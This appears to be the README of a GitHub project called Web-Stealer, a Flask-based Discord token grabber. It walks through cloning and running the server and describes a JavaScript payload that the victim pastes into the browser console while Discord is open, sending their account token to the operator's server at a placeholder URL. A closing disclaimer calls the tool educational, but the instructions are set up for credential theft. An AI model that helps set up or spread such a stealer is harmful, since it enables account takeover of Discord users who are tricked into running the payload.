Skip to content

Latest commit

 

History

History
41 lines (27 loc) · 1.27 KB

README.md

File metadata and controls

41 lines (27 loc) · 1.27 KB

Web-Stealer Setup Guide

Platforms

This tool is compatible with Windows, macOS, Linux, and any other operating systems that support Python and Flask.

Setup Instructions

  1. Clone the Repository:

    git clone https://github.com/osintcats/web-stealer.git
    
  2. Navigate to the Project Directory:

    cd web-stealer
    
  3. Install Required Python Packages: Ensure you have Python and pip installed. Create a requirements.txt file with the required dependencies and install them:

    pip install -r requirements.txt
    
  4. Run the Flask Application:

    python api.py
    

Payload JavaScript Snippet

To send the token to your server, use the following JavaScript snippet. Replace 'PASTE_URL_HERE' with the URL of your Flask application. Copy the generated payload and paste it into the browser console while Discord is open. The token will be sent to your server.

Credz

fixes by baum1810

Disclaimer

This program is intended solely for educational purposes to highlight potential security vulnerabilities. Do not use this program for unauthorized access or token grabbing. The creator assumes no responsibility for any damage or misuse resulting from the use of this software.